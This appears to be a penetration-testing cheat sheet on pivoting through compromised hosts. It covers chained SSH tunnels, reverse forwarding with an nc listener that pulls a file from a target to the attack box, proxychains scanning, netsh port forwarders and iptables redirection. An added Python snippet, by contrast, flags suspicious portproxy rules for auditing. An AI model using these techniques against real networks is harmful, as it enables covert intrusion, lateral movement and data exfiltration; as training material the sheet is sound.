Tunneling
SSH
-M Places the SSH client into "Master" mode for connection sharing
-S [ctl_path] Specifies the location of a control socket for connection sharing; used without -M, it creates a Slave connection over a previously set up Master connection
-L Local port forward (forward tunnel): a local listening port that is forwarded through the SSH connection to a remote host:port, set up for a future connection
-R Remote port forward (reverse tunnel): a port opened on the SSH server side that is forwarded back to a host:port reachable from the client
ssh -M -S /tmp/T1 user@[1st Target IP] -p [Target 1 SSH port] -L [RHP1]:[2nd Target IP]:[Target 2 SSH Port]
ssh -M -S /tmp/T2 user@127.0.0.1 -p [RHP1] -L [RHP2]:[3rd Target IP]:[Target 3 SSH Port]
ssh -M -S /tmp/T3 user@127.0.0.1 -p [RHP2]
Example:
ssh -M -S /tmp/T1 root@10.0.0.1 -p 22 -L 14002:10.0.0.2:22
ssh -M -S /tmp/T2 admin@127.0.0.1 -p 14002 -L 14003:10.0.0.3:22
ssh -M -S /tmp/T3 vyos@127.0.0.1 -p 14003
All these masters are set up and connected
*You can now open a new terminal to T2 above (without opening a separate connection) using -S
ssh -S /tmp/T2 admin@127.0.0.1 -p 14002
Reverse:
ssh -M -S /tmp/T3 vyos@127.0.0.1 -p 14003 -R 14002:0.0.0.0:14002
nc listener on the attack box to receive a file from Target 4 through the reverse tunnel: nc -lvnp 14002 > [file.txt]
Banner Grab
When you find a new IP of interest, add the forward connection to your already created master SSH connection
Already created Master: ssh -M -S /tmp/t1 user@[Target 1 IP] -p 22
add the forward: ssh -S /tmp/t1 user@[Target 1 IP] -p 22 -L 14002:[newly found ip]:22
telnet 127.0.0.1 14002
nc -vn 127.0.0.1 14002
ProxyChains
Set up
Add -D 9050 (the proxychains default port; opens a SOCKS listener on 127.0.0.1:9050) -N -f to the end of your SSH commands (-N: no remote command, -f: go to the background)
configuration (you can add more): /etc/proxychains.conf
default: socks4 127.0.0.1 9050
Close Proxychains ssh connection
ssh -S /tmp/T1 -O cancel -D 9050 user@127.0.0.1 -p 22
Scanning with Proxychains
proxychains nc -nz [IP] [port range]
proxychains nmap -sT -Pn [IP] -p [port range]
NetSH
netsh port forwarding:
netsh interface portproxy add v4tov4 listenport=6969 connectaddress=[forwardIP] connectport=22
-This sets up a rule to forward traffic arriving on port 6969 to [forwardIP]:22
netsh interface portproxy show all
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         6969        10.169.0.9      22
Create a new forward on Target 2
ssh -S /tmp/t2 [username]@127.0.0.1 -p 14002 -L 14003:10.169.0.9:6969
Then connect to T3 through newly established forward tunnel
ssh -M -S /tmp/t3 [username]@127.0.0.1 -p 14003
Show current portproxy rules
netsh interface portproxy show all
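To audit a host for forwarders like the one above, here is an added example (not from the original cheat sheet) that parses the `show all` output and flags rules that relay traffic off the host or to a remote-administration port; the sample output and the list of sensitive ports are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

@dataclass(frozen=True)
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

# Constructed sample of `netsh interface portproxy show all` output, not captured from a real host.
SAMPLE_OUTPUT = """Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         6969        10.169.0.9      22
127.0.0.1       8080        127.0.0.1       80
"""

# A data row is address, port, address, port; header and separator lines do not match.
ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")

# Assumed review heuristic (remote-administration ports), not a Windows standard.
SENSITIVE_PORTS = frozenset({22, 3389, 445, 5985, 5986})

def parse_portproxy(output: str) -> List[PortProxyRule]:
    """Parse the table rows of `netsh interface portproxy show all` into rules."""
    rules = []
    for line in output.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rules.append(PortProxyRule(m.group(1), int(m.group(2)), m.group(3), int(m.group(4))))
    return rules

def suspicious_rules(rules: List[PortProxyRule]) -> List[Tuple[PortProxyRule, List[str]]]:
    """Flag rules that expose a listener on every interface and relay off-host,
    or that relay to a remote-administration port."""
    flagged = []
    for r in rules:
        reasons = []
        if r.listen_addr in ("0.0.0.0", "*") and not r.connect_addr.startswith("127."):
            reasons.append("listens on all interfaces and relays to a non-loopback host")
        if r.connect_port in SENSITIVE_PORTS:
            reasons.append("relays to remote-administration port %d" % r.connect_port)
        if reasons:
            flagged.append((r, reasons))
    return flagged
```

Feed it the saved output of the command above; a loopback-to-loopback rule such as the second sample row is not flagged, while the 0.0.0.0 to 10.169.0.9:22 relay is reported for both reasons.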
Delete
netsh interface portproxy delete v4tov4 listenport=6969 listenaddress=[listen IP, only if one was set on add] protocol=tcp
netsh interface portproxy reset
netsh advfirewall firewall delete rule name="[rule name]"
IPTables Redirection
Prerouting rules:
iptables -A PREROUTING -t nat -s <kalibox> -d <redirIP> -p tcp --dport <targetport> -j DNAT --to-destination <targetIP>:<targetPort>
Explained: anything coming from <kalibox> with destination <redirIP> and destination port <targetport> is sent on to <targetIP>:<targetPort>
Reverse Translation:
iptables -A PREROUTING -t nat -s <targetIP> -d <redirIP> -p tcp -j DNAT --to-destination <kaliBox>
Explained: anything coming from <targetIP> with destination <redirIP> is sent on to <kaliBox>
Note: add --dport <port> to the match so only that port is redirected rather than a full take of traffic from <targetIP>
Postrouting Source IP changes:
Explained: the source IP has not changed yet, so you need POSTROUTING rules so that traffic goes from <targetIP> to <redirIP> to <kaliBox>
KaliBox to Target:
iptables -A POSTROUTING -t nat -s <kalibox> -d <targetIP> -p tcp -j SNAT --to-source <redirIP>
Explained: anything coming from <kalibox> that is destined for <targetIP> gets its source address changed to <redirIP>
Target to KaliBox
iptables -A POSTROUTING -t nat -s <targetIP> -d <kalibox> -p tcp -j SNAT --to-source <redirIP>
Explained: anything coming from <targetIP> that is destined for <kalibox> gets its source address changed to <redirIP>